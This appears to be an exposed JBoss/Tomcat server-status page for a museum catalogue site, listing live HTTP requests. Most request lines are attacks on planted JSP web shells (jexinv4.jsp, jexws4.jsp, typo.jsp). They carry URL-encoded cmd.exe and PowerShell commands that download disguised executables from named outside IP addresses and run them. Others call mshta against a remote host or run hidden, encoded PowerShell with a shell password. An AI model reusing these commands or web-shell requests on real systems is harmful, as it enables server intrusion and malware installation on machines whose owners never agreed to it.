JVM

Free memory: 132.34 MB Total memory: 210.37 MB Max memory: 493.06 MB

ajp-0.0.0.0-8009

Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB

StageTimeB SentB RecvClientVHostRequest

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive

http-0.0.0.0-8080

Max threads: 250 Current thread count: 149 Current thread busy: 50
Max processing time: 4723607767 ms Processing time: 1.94658784E8 s Request count: 484079 Error count: 23834 Bytes received: 44.27 MB Bytes sent: 6838.56 MB

StageTimeB SentB RecvClientVHostRequest
S156171847 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F202.56.166.78%3A8888%2Fgaji%2Fjs%2Fwindllhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwindllhost.exe HTTP/1.1
R??????
S249372433 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostx.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe HTTP/1.1
R??????
R??????
S5012915396 ms0 KB0 KB106.114.79.24281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
S2454439446 ms0 KB0 KB221.192.179.9281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S4028131355 ms0 KB0 KB154.160.17.55catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1177900869 ms0 KB0 KB154.160.16.122catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
S4545484293 ms0 KB0 KB221.192.181.2981.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
S4024939735 ms0 KB0 KB154.160.17.55catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S4352264911 ms0 KB0 KB221.192.179.20081.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
S4029053230 ms0 KB0 KB154.160.17.55catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S4028986582 ms0 KB0 KB154.160.17.55catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S3802697686 ms0 KB0 KB60.1.206.8481.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
S4028848372 ms0 KB0 KB154.160.17.55catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S3801734915 ms0 KB0 KB60.1.206.8481.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
S3076443899 ms0 KB0 KB221.192.178.8881.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
S3588717896 ms0 KB0 KB221.192.179.4181.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S1178522420 ms0 KB0 KB154.160.16.122catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1178036738 ms0 KB0 KB154.160.16.122catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
S155521456 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
S3075480973 ms0 KB0 KB221.192.178.8881.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S238175042 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostdll.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe HTTP/1.1
R??????
S238546125 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostp.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe HTTP/1.1
R??????
R??????
R??????
R??????
R??????
S1372573613 ms0 KB0 KB102.176.65.39catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S3340840938 ms0 KB0 KB102.176.65.154catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
K17152 ms??114.119.138.147??
R??????
S1178594721 ms0 KB0 KB154.160.16.122catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
S1208056612 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
R??????
S1208088029 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
R??????
R??????
R??????
S1208012684 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
S3245441255 ms0 KB0 KB221.192.180.17481.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
S252473373 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhost.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhost.exe HTTP/1.1
R??????
R??????
R??????
S1208076940 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
S3244478385 ms0 KB0 KB221.192.180.17481.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
R??????
R??????
R??????
S1178060917 ms0 KB0 KB154.160.16.122catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
S1208031777 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
S159658866 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F83.133.184.251%2Fadmin%2Fjs%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
S1208025760 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
S1208019340 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
S779326959 ms0 KB0 KB102.176.65.144catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
S1372638959 ms0 KB0 KB102.176.65.39catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
S154965029 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
S2453476484 ms0 KB0 KB221.192.179.9281.45.140.46GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1
S779623062 ms0 KB0 KB102.176.65.144catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
R??????
R??????
R??????
R??????
S1208065248 ms0 KB0 KB102.176.65.110catalogo.museolazarogaldiano.esGET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1
R??????
R??????
R??????
S159284265 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows%5Cwinhost2.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F83.133.184.251%2Fadmin%2Fjs%2Fwinhost2.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost2.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost2.exe HTTP/1.1
R??????
R??????
R??????
R??????
S605237325 ms0 KB0 KB206.253.167.21381.45.140.46GET /jexws4/jexws4.jsp?ppp=%22C%3A%5CProgram+Files%5CInternet+Explorer%5Ciexplore.exe%22+http%3A%2F%2Ftakkasihinfo.online%2F HTTP/1.1
R??????
R??????
R??????
R??????
S391983706 ms0 KB0 KB102.176.65.220catalogo.museolazarogaldiano.esPOST /jexws4/jexws4.jsp HTTP/1.1
R??????
R??????
R??????
K465 ms??114.119.138.239??
R??????
S136319806 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhostx.exe HTTP/1.1
R??????
R??????
R??????
R??????
S156885095 ms0 KB0 KB45.133.9.20281.45.140.46GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F202.56.166.78%3A8888%2Fgaji%2Fjs%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1
R??????
R??????
S484 ms24 KB0 KB3.210.184.142catalogo.museolazarogaldiano.esGET /status HTTP/1.1
R??????
R??????

P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive